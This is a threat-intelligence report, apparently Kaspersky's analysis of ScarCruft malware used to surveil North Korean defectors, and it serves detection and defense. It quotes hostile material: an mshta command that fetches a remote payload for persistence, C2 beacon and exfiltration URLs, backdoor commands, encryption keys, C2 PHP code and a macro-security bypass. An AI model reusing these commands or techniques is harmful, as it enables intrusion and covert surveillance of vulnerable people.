{ "id": "4865c75a-e8f7-4d73-8f51-f6286d9d2682", "created_at": "2026-04-06T00:11:40.542326Z", "updated_at": "2026-04-10T03:38:06.639784Z", "deleted_at": null, "sha1_hash": "fa9c020074f0dafaa088c04e67d4bd164b598db7", "title": "ScarCruft surveilling North Korean defectors and human rights activists", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3448888, "plain_text": "ScarCruft surveilling North Korean defectors and human rights activists\r\nBy GReAT\r\nPublished: 2021-11-29 · Archived: 2026-04-02 11:26:48 UTC\r\nThe ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor we first reported in\r\n2016. ScarCruft is known to target North Korean defectors, journalists who cover North Korea-related news and government\r\norganizations related to the Korean Peninsula, between others. Recently, we were approached by a news organization with a\r\nrequest for technical assistance during their cybersecurity investigations. As a result, we had an opportunity to perform a\r\ndeeper investigation on a host compromised by ScarCruft. The victim was infected by PowerShell malware and we\r\ndiscovered evidence that the actor had already stolen data from the victim and had been surveilling this victim for several\r\nmonths. The actor also attempted to send spear-phishing emails to the victims’ associates working in businesses related to\r\nNorth Korea by using stolen login credentials.\r\nBased on the findings from the compromised machine, we discovered additional malware. The actor utilized three types of\r\nmalware with similar functionalities: versions implemented in PowerShell, Windows executables and Android applications.\r\nAlthough intended for different platforms, they share a similar command and control scheme based on HTTP\r\ncommunication. Therefore, the malware operators can control the whole malware family through one set of command and\r\ncontrol scripts.\r\nWe were working closely with a local CERT to investigate the attacker’s command and control infrastructure and as a result\r\nof this, we were able better understand how it works. The APT operator controls the malware using a PHP script on the\r\ncompromised web server and controls the implants based on the HTTP parameters. We were also able to acquire several log\r\nfiles from the compromised servers. Based on said files, we identified additional victims in South Korea and compromised\r\nweb servers that have been utilized by ScarCruft since early 2021. Additionally, we discovered older variants of the\r\nmalware, delivered via HWP documents, dating back to mid-2020.\r\nMore information about ScarCruft is available to customers of Kaspersky Intelligence Reporting. Contact:\r\nintelreports@kaspersky.com\r\nSpear-phishing document\r\nBefore spear-phishing a potential victim and sending a malicious document, the actor contacted an acquaintance of the\r\nvictim using the victim’s stolen Facebook account. The actor already knew that the potential target ran a business related to\r\nNorth Korea and asked about its current status. After a conversation on social media, the actor sent a spear-phishing email to\r\nthe potential victim using a stolen email account. The actor leveraged their attacks using stolen login credentials, such as\r\nFacebook and personal email accounts, and thereby showed a high level of sophistication.\r\nAfter a Facebook conversation, the potential target received a spear-phishing email from the actor. It contains a password-protected RAR archive with the password shown in the email body. The RAR file contains a malicious Word document.\r\nSpear-phishing email and decoy\r\nThis document contains a lure related to North Korea.\r\nMD5 File name Modified time Author\r\nLast saved\r\nuser\r\nbaa9b34f152076ecc4e01e35ecc2de18 북한의 최근 정세와 우리의 안\r\n보.doc\r\n2021-09-03\r\n09:34:00\r\nLeopard Cloud\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 1 of 12\n\n(North Korea’s latest situation\r\nand our national security)\r\nThis document contains a malicious macro and a payload for a multi-stage infection process. The first stage’s macro\r\ncontains obfuscated strings and then spawns another macro as a second stage.\r\nThe first stage macro checks for the presence of a Kaspersky security solution on the victim’s machine by trying the\r\nfollowing file paths:\r\nC:\\Windows\\avp.exe # Kaspersky AV\r\nC:\\Windows\\Kavsvc.exe # Kaspersky AV\r\nC:\\Windows\\clisve.exe # Unknown\r\nIf a Kaspersky security solution is indeed installed on the system, it enables trust access for Visual Basic Application (VBA)\r\nby setting the following registry key to ‘1’:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\[Application.Version]\\Word\\Security\\AccessVBOM\r\nBy doing so, Microsoft Office will trust all macros and run any code without showing a security warning or requiring the\r\nuser’s permission. Next, the macro creates a mutex named ‘sensiblemtv16n’ and opens the malicious file once more. Thanks\r\nto the “trust all macros” setting, the macro will be executed automatically.\r\nIf no Kaspersky security software is installed, the macro directly proceeds to decrypt the next stage’s payload. In order to\r\nachieve this, it uses a variation of a substitution method. The script compares the given encrypted string with a second string\r\nto get an index of matched characters. Next, it receives a decrypted character with an index acquired from the first string.\r\nFirst string: BU+13r7JX9A)dwxvD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V\u0026tC,uYz=Z0RS8aM4Fqn\r\nSecond string: v\u0026tC,uYz=Z0RS8aM4FqnD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V7JX9A)dwxBU+13r\r\nThe decrypted second stage Visual Basic Application (VBA) contains shellcode as a hex string. This script is responsible for\r\ninjecting the shellcode into the process notepad.exe.\r\nShellcode in the second stage VBA\r\nThe shellcode contains the URL to fetch the next stage payload. After fetching the payload, the shellcode decrypts it with\r\ntrivial single-byte XOR decryption. Unfortunately, we weren’t able to gather the final payload when we investigated this\r\nsample.\r\nThe payload’s download path is:\r\nhxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4\r\nHost investigation\r\nAs a result of our efforts in helping the victim with the analysis, we had a chance to investigate the host of the owner who\r\nsent the spear-phishing email. When we first checked the process list, there was a suspicious PowerShell process running\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 2 of 12\n\nwith a rather suspicious parameter.\r\nThis PowerShell command was registered via the Run registry key as a mechanism for persistence:\r\nRegistry path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run – ONEGO\r\nc:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n\r\n1 -w 300000 2.2.2.2 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html\r\nThis registry key causes the HTML Application (HTA) file to get fetched and executed by the mshta.exe process every time\r\nthe system is booted. The fetched ‘1.html’ is an HTML Application (.hta) file that contains Visual Basic Script (VBS), which\r\neventually executes PowerShell commands.\r\nThe PowerShell script offers simple backdoor functionalities and continuously queries the C2 server with HTTP POST\r\nrequests containing several parameters. At first, it sends a beacon to the C2 server with the host name:\r\nhxxp://[redacted].cafe24[.]com/bbs/probook/do.php?type=hello\u0026direction=send\u0026id=[host name]\r\nNext, it attempts to download commands from the C2 server with the following format:\r\nhxxp://[redacted].cafe24[.]com/bbs/probook/do.php??type=command\u0026direction=receive\u0026id=\r\nIf the HTTP response from the C2 server is 200, it checks the response data and executes the delivered commands.\r\nDelivered\r\ndata\r\nDescription\r\nref:\r\nSend a beacon to the C2 server:\r\nHTTP request: ?type=hello\u0026direction=send\u0026id=\r\ncmd:\r\nIf the command data includes ‘start’, execute the given command with cmd.exe and send base64 encoded\r\n‘OK’ with the following POST format. Otherwise, it executes the given command, redirecting the result\r\nto the result file (%APPDATA%\\desktop.dat), and sends the contents of the file after base64 encoding.\r\nHTTP request: ?type=result\u0026direction=send\u0026id=\r\nWe discovered additional malware, tools and stolen files from the victim’s host. Due to limited access to the compromised\r\nhost, we were unable to figure out the initial infection vector. However, we assess this host was compromised on March 22,\r\n2021, based on the timestamp of the suspicious files. One characteristic of the malware we discovered from the victim is the\r\nwriting of execution results from commands to the file “%appdata%\\desktop.dat”. According to the Master File Table\r\n(MFT) information, this file was created the same day, March 22, 2021, and the last modification time is on September 8,\r\n2021, which means this file was used until just before our investigation.\r\nUsing the additional tools, the malware operator collected sensitive information from this victim, although we can’t assess\r\nexactly how much data was exfiltrated and what kind of data was stolen. Based on the timestamp of the folders and files\r\ncreated by the malware, the actor collected and exfiltrated files as early as August 2021. The log files with the .dat extension\r\nare encrypted, but can be decrypted with the one-byte XOR key 0x75. These log files contain the uploading history. We\r\nfound two log files and each of them contains slightly different logs. The ‘B14yNKWdROad6DDeFxkxPZpsUmb.dat’ file\r\ncontains zipping and uploading of the folder bearing the same name. The log file presents the process as: “Zip Dir Start \u003e\r\nUp Init \u003e Up Start \u003e Up File Succeed \u003e Zip Dir Succeed”. According to the log file, the malware operator collected\r\nsomething from the infected system in this folder and uploaded it after archiving.\r\nFile archiving and uploading log\r\nThe other log file, named “s5gRAEs70xTHkAdUjl_DY1fD.dat”, also contains a file uploading history, except for file\r\nzipping messages. It processes each file with this procedure: “Up Init \u003e Up Start \u003e Up File Succeed”.\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 3 of 12\n\nFile uploading log\r\nBased on what we found from this victim, we can confirm that the malware operator collected screenshots and exfiltrated\r\nthem between August 6, 2021 and September 8, 2021.  Based on what we found out from the victim, we can summarize the\r\nwhole infection timeline. We suspect this host was compromised on March 22, 2021. After the initial infection, the actor\r\nattempted to implant additional malware, but an error occurred that led to the crash of the malware. The malware operator\r\nlater delivered the Chinotto malware in August 2021 and probably started to exfiltrate sensitive data from the victim.\r\nTimeline of the attack on the victim\r\nWindows executable Chinotto\r\nAs a result of the host investigation, we discovered a malicious Windows executable and found additional malware variants\r\nfrom VirusTotal and our own sample collection. One of the Windows executables contains a build path and the malware\r\nauthor appears to call the malware “Chinotto“.\r\nPDB path\r\nThe technical specifications in this analysis are based on the Chinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1)\r\nwe discovered from the host investigation. One of the characteristics of this malware is that it contains a lot of garbage code\r\nto impede analysis. During runtime, the malware copies unused data to the allocated buffer before copying the real value; or\r\nallocates an unused buffer, filling it with meaningless data, and never uses it.\r\nIt also restores functional strings such as C2 addresses and debugging messages to the stack at runtime. The malware creates\r\na mutex and fetches the C2 addresses, which are different for each sample we discovered:\r\nMutex: NxaNnkHnJiNAuDCcoCKRAngjHVUZG2hSZL03pw8Y\r\nC2 address: hxxp://luminix.openhaja[.]com/bbs/data/proc1/proc.php\r\nIn order to generate the identification value of the victim, the malware acquires both computer and user name and combines\r\nthem in the format ‘%computer name%_%user name%’. Next, it encrypts the acquired string with the XOR key\r\n‘YFXAWSAEAXee12D4’ and encodes it with base64.\r\nThe backdoor continuously queries the C2 server, awaiting commands from the malware operator. We observed an early\r\nversion of Chinotto malware (MD5 55afe67b0cd4a01f3a9a6621c26b1a49) which, while it also follows this simple principle,\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 4 of 12\n\nuses a hard-coded backdoor command ‘scap’. This means this specific sample is only designed for exfiltrating the victim’s\r\nscreenshot.\r\nThe Chinotto malware shows fully fledged capabilities to control and exfiltrate sensitive information from the victims.\r\nCommand Description\r\nref:\r\nSend beacon to the C2 server:\r\nhttp://[C2 URL]?ref=id=%s\u0026type=hello\u0026direction=send\r\ncmd:\r\nExecute Windows commands and save the result to the %APPDATA%\\s5gRAEs70xTHkAdUjl_DY1f.dat file after encrypting with\r\none-byte XOR key\r\ndown: Download file from the remote server\r\nup: Upload file\r\nstate: Upload log file (s5gRAEs70xTHkAdUjl_DY1fD.dat)\r\nregstart:\r\nCopy current malware to the CSIDL_COMMON_DOCUMENTS folder and execute command to register file to run registry:\r\n“reg add HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v a2McCq /t REG_SZ /d %s /f”\r\ncleartemp: Remove files from folder “%APPDATA%\\s5gRAEs70xTHkAdUjl_DY1fD”\r\nupdir:\r\nArchive directory and upload it. Archive is XOR encoded using the same key used when creating the identification value:\r\n‘YFXAWSAEAXee12D4’\r\ninit:\r\nCollect files with following extensions from the paths CSIDL_DESKTOP, CSIDL_PERSONAL(CSIDL_MYDOCUMENTS),\r\nCSIDL_MYMUSIC, CSIDL_MYVIDEO. Downloads and upload them to C2 server:\r\njpg|jpeg|png|gif|bmp|hwp|doc|docx|xls|xlsx|xlsm|ppt|pptx|pdf|txt|mp3|amr|m4a|ogg|aac|wav|wma|3gpp|eml|lnk|zip|rar|egg|alz|7z|vcf|3\r\nscap:\r\nTake a screenshot, save it to the folder “%appdata%\\s5gRAEs70xTHkAdUjl_DY1fD” in an archived format. The file to store the\r\nscreenshot has an ‘e_‘ prefix and 10 randomly generated characters as a filename. When uploading the screenshot file, it uses\r\n‘wrpdwRwsFEse’ as the filename\r\nrun: Run Windows commands with ShellExecuteW API\r\nchdec: Download an encrypted file and decrypt it via CryptUnprotectData API\r\nupdate:\r\nDownload updated malware and register it:\r\nreg add HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v m4cVWKDsa9WxAWr41iaNGR /t\r\nREG_SZ /d %s /f\r\nwait: Sleep for 30 minutes\r\nwakeup: Wake up after 2.5 seconds\r\nAnother malware sample (MD5 04ddb77e44ac13c78d6cb304d71e2b86) that demonstrated a slight difference during\r\nruntime was discovered from the same victim. This is the same fully featured backdoor, but it loads the backdoor command\r\nusing a different scheme. The malware checks for the existence of a ‘*.zbpiz’ file in the same folder. If it exists, it loads the\r\nfile’s content and uses it as a backdoor command after decrypting. The malware authors keep changing the capabilities of\r\nthe malware to evade detection and create custom variants depending on the victim’s scenario.\r\nIn addition, there are different Windows executable variants of the Chinotto malware. Apart from the conventional Chinotto\r\nmalware mentioned above, a different variant contains an embedded PowerShell script. The spawned PowerShell command\r\nhas similar functionality to the PowerShell we found from the victim. However, it contains additional backdoor commands,\r\nsuch as uploading and downloading capabilities. Based on the build timestamp of the malware, we assess that the malware\r\nauthor used the PowerShell embedded version from mid-2019 to mid-2020 and started to use the malicious, PowerShell-less\r\nWindows executable from the end of 2020 onward.\r\nAndroid Chinotto\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 5 of 12\n\nBased on the C2 communication pattern, we discovered an Android application version of Chinotto malware (MD5\r\n56f3d2bcf67cf9f7b7d16ce8a5f8140a). This malicious APK requests excessive permissions according to the\r\nAndroidManifest.xml file. To achieve its purpose of spying on the user, these apps ask users to enable various sorts of\r\npermissions. Granting these permissions allows the apps to collect sensitive information, including contacts, messages, call\r\nlogs, device information and audio recordings. Each sample has a different package name, with the analyzed sample bearing\r\n“com.secure.protect” as a package name.\r\nThe malware sends its unique device ID in the same format as the Windows executable version of Chinotto.\r\nBeacon URI pattern: [C2 url]?type=hello\u0026direction=send\u0026id=[Unique Device ID]\r\nNext, it receives a command after the following HTTP request:\r\nRetrieve commands: [C2 url]?type=command\u0026direction=receive\u0026id=[Unique Device ID]\r\nIf the delivered data from the C2 server is not “ERROR” or “Fail”, the malware starts to carry out backdoor operations.\r\nCommand URI pattern Description\r\nref:\r\n?\r\ntype=hello\u0026direction=send\u0026id=\r\nSend the same beacon request to the C2 server\r\ndown ?type=file\u0026direction=send\u0026id=\r\nUpload the temporary file (/sdcard/.temp-file.dat) to the C2 server\r\nand remove it from local storage.\r\nUriP ?type=file\u0026direction=send\u0026id=\r\nSave temporary file path to the result file (/sdcard/result-file.dat) and\r\nupload the temporary file.\r\nUploadInfo\r\n?\r\ntype=hello\u0026direction=send\u0026id=\r\n?type=file\u0026direction=send\u0026id=\r\nAfter sending a beacon, collect the following information to the\r\n/icloud/tmp-web path:\r\nInfo.txt: Phone number, IP address, SDK version (OS\r\nversion), Temporary file path\r\nSms.txt: Save all text messages with JSON format\r\nCalllog.txt: Save all call logs with JSON format\r\nContact.txt: Save all contact lists with JSON format\r\nAccount.txt: Save all account information with JSON format\r\nUpload collected file after archiving. The archived file is encrypted\r\nby AES with the key “3399CEFC3326EEFF”.\r\nUploadFile ?type=file\u0026direction=send\u0026id=\r\nExecute command ‘cd /sdcard;ls -alR’, save the result to the\r\ntemporary file (/sdcard/.temp-file.dat) and upload it. Upload all\r\nthumbnails and photos after encrypting via AES and the key\r\n“3399CEFC3326EEFF”.\r\nETC ?type=file\u0026direction=send\u0026id=\r\nExecute command saving the result to the result file (/sdcard/result-file.dat)\r\nand upload the result\r\n?type=file\u0026direction=send\u0026id\r\nWe found that the actor had an interest in a more specific file list in one variant (MD5\r\ncba17c78b84d1e440722178a97886bb7). The ‘UploadFile’ command of this variant uploads specific files to the C2 server. \r\nThe AMR file is an audio file generally used for recording phone calls. Also, Huawei cloud and Tencent services are two of\r\nthe targets. To surveil the victim, the list includes target folders as well as /Camera, /Recordings, /KakaoTalk (a renowned\r\nKorean messenger), /문건(documents), /사진(pictures) and /좋은글(good articles).\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 6 of 12\n\nTargeted files and folders\r\nTo sum up, the actor targeted victims with a probable spear-phishing attack for Windows systems and smishing for Android\r\nsystems. The actor leverages Windows executable versions and PowerShell versions to control Windows systems. We may\r\npresume that if a victim’s host and mobile are infected at the same time, the malware operator is able to overcome two-factor\r\nauthentication by stealing SMS messages from the mobile phone. After a backdoor operation with a fully featured backdoor,\r\nthe operator is able to steal any information they are interested in. Using the stolen information, the actor further leverages\r\ntheir attacks. For example, the group attempts to infect additional valuable hosts and contact potential victims using stolen\r\nsocial media accounts or email accounts.\r\nAttack procedure\r\nOlder malicious HWP documents\r\nThe threat actor behind this campaign delivered the same malware with a malicious HWP file. At that time, lures related to\r\nCOVID-19 and credential access were used.\r\nHWP hash HWP file name Dropped payload hash\r\nf17502d3e12615b0fa8868472a4eabfb\r\n코로나19 재감염 사례-백신 무용\r\n지물.hwp\r\n(Covid-19 reinfection case-Useless\r\nvaccine.hwp)\r\n72e5b8ea33aeb083631d1e8b302e76af\r\n(Visual Basic Script)\r\nc155f49f0a9042d6df68fb593968e110\r\n계정기능 제한 안내.hwp\r\n(Notice of limitation of\r\naccount.hwp)\r\n5a7ef48fe0e8ae65733db64ddb7f2478\r\n(Windows executable)\r\nThe Visual Basic Script created by the first HWP file (MD5 f17502d3e12615b0fa8868472a4eabfb) has similar\r\nfunctionalities to the Chinotto malware. It also uses the same HTTP communication pattern. The second payload dropped\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 7 of 12\n\nfrom the malicious HWP is a Windows executable executing an embedded PowerShell script with the same functionalities.\r\nThese discoveries reveal related activity dating back to at least mid-2020.\r\nInfrastructure\r\nIn this campaign, the actor relied solely on compromised web servers, mostly located in South Korea. During this research\r\nwe worked closely with the local CERT to take down the attacker’s infrastructure and had a chance to look into one of the\r\nscripts on the C2 servers that control the Chinotto malware. The C2 script (named “do.php”) uses several predefined files to\r\nsave the client’s status (shakest) and commands (comcmd). Also, it parses several parameters (id, type, direction, data)\r\ndelivered by the HTTP request from the implant:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n    $type = \"\";             # 'type' parameter\r\n    $shakename = \"shakest\"; # Save client status\r\n    $comcmdname = \"comcmd\"; # Save commands\r\n    $btid = \"\";             # Client unique ID\r\n    $direction = \"\";        # 'direction' parameter\r\n    $data = \"\";             # 'data' parameter\r\n    if (isset($_GET['id'])){\r\n   $btid = $_GET['id'];\r\n    }\r\n    if (isset($_GET['type'])){\r\n   $type = $_GET['type'];\r\n    }\r\n    if (isset($_GET['direction'])){\r\n   $direction = $_GET['direction'];\r\n    }\r\n    if (isset($_GET['data'])){\r\n   $data = $_GET['data'];\r\n    ..\r\n    $comname = $btid.\"\";\r\n    $comresname = $comname . \"-result\";\r\nIn order to control the client, the C2 script uses HTTP parameters. First, it checks the value of the ‘type’ parameter. The\r\n‘type’ parameter carries four values: hello, command, result, and file.\r\nValue of ‘type’ param Description\r\nhello Report and control the client status\r\ncommand Hold the command from the operator or retrieve the command from the client\r\nresult Upload the command execution result or retrieve the command\r\nfile Upload file to the C2 server\r\n‘hello’ type\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 8 of 12\n\nWhen the script receives the ‘type=hello’ parameter, it checks the value of ‘direction’. In this routine, the script checks the\r\nstatus of the client. The malware operator saves the client status to a specific file, the ‘shakest’ file in this case. If the ‘send’\r\nvalue is being received, the client status is set to ‘ON’. If ‘receive’ is set as well, the client’s status log file is sent (likely in\r\norder to send the status of clients to the malware operator). The ‘refresh’ value is for setting all clients to ‘OFF’ and ‘release’\r\nis used to initialize the command file. The client just replies ‘OK’.\r\n‘type=hello’ commands\r\n‘command’ type\r\nIn order to manage the implant’s commands, the C2 script handles several additional parameters. If the ‘type=command’\r\nalongside ‘direction=receive’ is set, it issues a request from the client to retrieve a command.\r\nThere are two kinds of command files: common commands like an initial command or commands sent to all clients, and\r\nindividual commands for a specific client. If an individual command exists for a client, it delivers it. Otherwise, the client is\r\nsent a common command. If the ‘direction’ parameter is set to ‘send’, the request is coming from the malware operator in\r\norder to save the sent command in the C2 server. Using this request, the operator can set two commands files: common\r\ncommand or individual command. If the ‘botid’ parameter contains ‘cli’, it means this request is for setting a common\r\ncommand file. If the ‘data’ parameter contains ‘refclear:’, the common command file gets initialized. Otherwise, the ‘data’\r\nvalue is saved to the common command file. If ‘botid’ is not ‘cli’, it means this request is directed to an individual command\r\nfile. The process of saving the individual command file is the same as the process used for saving the common command.\r\ntype=command commands\r\n‘result’ type\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 9 of 12\n\nWhen uploading command execution results coming from the implant, the script sets the ‘type’ parameter to ‘result’. If the\r\n‘direction’ parameter equals ‘send’, it saves the value of the ‘data’ parameter to the individual result file: “[botid]-result“.\r\nThe ‘receive’ value of the ‘direction’ parameter means retrieving the individual result file. The script then sends the result\r\nfile to the operator after encoding it with base64.\r\n‘file’ type\r\nThe last possible ‘type’ command is ‘file’. This value is used for exfiltrating files from the victim. If a file upload succeeds,\r\nthe script sends the message ‘SEND SUCCESS’. Otherwise, it sends ‘There was an error uploading the file, please try\r\nagain!’.\r\nWe discovered that the malware operator used a separate webpage to monitor and control the victims. From several\r\ncompromised C2 servers we see a control page carrying a ‘control.php’ file name.\r\nControl page from this case\r\nThe control page shows a simple structure. The operator can see a list of infected hosts in the left panel with the\r\ncorresponding status “ON” or “OFF”. Based on this information, the operator is able to issue a command using the right\r\npanel and watch the result from the client.\r\nVictims\r\nWe began this research by providing support to human rights activists and defectors from North Korea against an actor\r\nseeking to surveil and track them.\r\nAdditionally, we discovered further victims we couldn’t profile from analyzing the C2 servers. From analyzing the attacker’s\r\ninfrastructure, we found 75 client connections between January 2021 and February 2021. Most IP addresses seem to be Tor\r\nor VPN connections, which are likely to be either from researchers or the malware operators.\r\nAnalyzing other C2 servers, we found more information about possible additional victims. Excluding connections coming\r\nfrom Tor, there are only connections coming from South Korea. Based on the IP addresses, we could distinguish four\r\ndifferent suspected victims located in South Korea, and determine their operating system and browser used based on user-agent information:\r\nVictim A connected to the C2 server from July 16 to September 5 and has outdated versions of Windows OS and Internet\r\nExplorer. Victim B connected to this server on September 4 and operates Windows 8 and Internet Explorer 10. While we\r\nwere investigating the C2 server, Victim D kept connecting to it, using Windows 10 with Chrome version 78.\r\nTimeline of victims\r\nTo sum up, this campaign is targeting entities in South Korea, which is a top point of interest for ScarCruft. Based on our\r\nfindings, we also assume that the threat actor targeted individuals rather than specific companies or organizations.\r\nAttribution\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 10 of 12\n\nWe discovered several code overlaps with old ScarCruft malware named POORWEB. At first, when Chinotto malware\r\nuploads the file to the C2 server, it uses the HTTP POST request with a boundary generated with a random function. When\r\nChinotto malware (MD5 00df5bbac9ad059c441e8fef9fefc3c1) generates a boundary value, it executes the random()\r\nfunction twice and concatenates each value. The generation process is not exactly the same, but it utilizes a similar scheme\r\nas the old POORWEB malware (MD5 97b35c34d600088e2a281c3874035f59).\r\nHTTP boundary generation routine\r\nMoreover, there is additional code overlap with Document Stealer malware (MD5 cff9d2f8dae891bd5549bde869fe8b7a)\r\nthat was previously utilized with POORWEB malware. When the Chinotto malware checks the response from the C2 server,\r\nit checks whether the response is ‘HTTP/1.1 200 OK’ and not ‘error’. This Document Stealer malware also has the same\r\nroutine to check responses from the C2 server.\r\nC2 response check routine\r\nApart from code similarity, historically, ScarCruft group is known to surveil individuals related to North Korea such as\r\njournalists, defectors, diplomats and government employees. The target of this attack is within the same scope as previous\r\nScarCruft group campaigns. Based on the victimology and several code overlaps, we assess with medium confidence that\r\nthis cyber-espionage operation is related to the ScarCruft group.\r\nConclusions\r\nMany journalists, defectors and human rights activists are targets of sophisticated cyberattacks. Unlike corporations, these\r\ntargets typically don’t have sufficient tools to protect against and respond to highly skilled surveillance attacks. One of the\r\npurposes of our team is to help individuals targeted by APT groups. This research stemmed from this kind of endeavor. Our\r\ncollaboration with the local CERT allowed us to gain a unique look into ScarCruft’s infrastructure setup and allowed us to\r\ndiscover many technical details.\r\nUsing these findings, we found additional Android variants of the same malware, which has been invaluable in\r\nunderstanding and tracking ScarCruft TTPs. Moreover, while hunting for related activity, we uncovered an older set of\r\nactivity dating back to mid-2020, possibly indicating that ScarCruft operations against this set of individuals have been\r\noperating for a longer period of time.\r\nIndicators of compromise\r\nMalicious documents\r\nHTA file\r\nWindows executable Chinotto\r\nPowerShell embedded Chinotto\r\nc7c3b03108f2386022793ed29e621343\r\n5a7ef48fe0e8ae65733db64ddb7f2478\r\nb06c203db2bad2363caed1c0c11951ae\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 11 of 12\n\nf08d7f7593b1456a087eb9922507c743\r\n0dd115c565615651236fffaaf736e377\r\nd8ad81bafd18658c52564bbdc89a7db2\r\nAndroid application Chinotto\r\n71b63d2c839c765f1f110dc898e79d67\r\nc9fb6f127ca18a3c2cf94e405df67f51\r\n3490053ea54dfc0af2e419be96462b08\r\ncba17c78b84d1e440722178a97886bb7\r\n56f3d2bcf67cf9f7b7d16ce8a5f8140a\r\nPayload hosting URLs\r\nhxxps://api[.]onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4VH\r\nhxxp://www[.]djsm.co[.]kr/js/20170805[.]hwp\r\nCommand and control server\r\nhxxp://luminix[.]openhaja[.]com/bbs/data/proc1/proc[.]php\r\nhxxp://luminix[.]kr/bbs/data/proc/proc[.]php\r\nhxxp://kjdnc[.]gp114[.]net/data/log/do[.]php\r\nhxxp://kumdo[.]org/admin/cont/do[.]php\r\nhxxp://haeundaejugong[.]com/editor/chinotto/do[.]php\r\nhxxp://haeundaejugong[.]com/data/jugong/do[.]php\r\nhxxp://doseoul[.]com/bbs/data/hnc/update[.]php\r\nhxxp://hz11[.]cn/jquery-ui-1[.]10[.]4/tests/unit/widget/doc/pu[.]php\r\nMITRE ATT\u0026CK mapping\r\nTactic Technique Technique Name        \r\nResource Development T1584.006 Compromise Infrastructure: Web Services\r\nInitial Access T1566.001 Phishing: Spear-phishing Attachment\r\nExecution\r\nT1059.001\r\nT1059.005\r\nCommand and Scripting Interpreter: PowerShell\r\nCommand and Scripting Interpreter: Visual Basic\r\nPersistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder\r\nDefense Evasion\r\nT1140\r\nT1036.005\r\nDeobfuscate/Decode Files or Information\r\nMasquerading: Match Legitimate Name or Location\r\nDiscovery\r\nT1033\r\nT1082\r\nSystem Owner/User Discovery\r\nSystem Information Discovery\r\nCollection\r\nT1113\r\nT1560.002\r\nScreen Capture\r\nArchive Collected Data: Archive via Library\r\nCommand and Control\r\nT1071.001\r\nT1573.001\r\nApplication Layer Protocol: Web Protocols\r\nEncrypted Channel: Symmetric Cryptography\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nSource: https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/" ], "report_names": [ "105074" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper 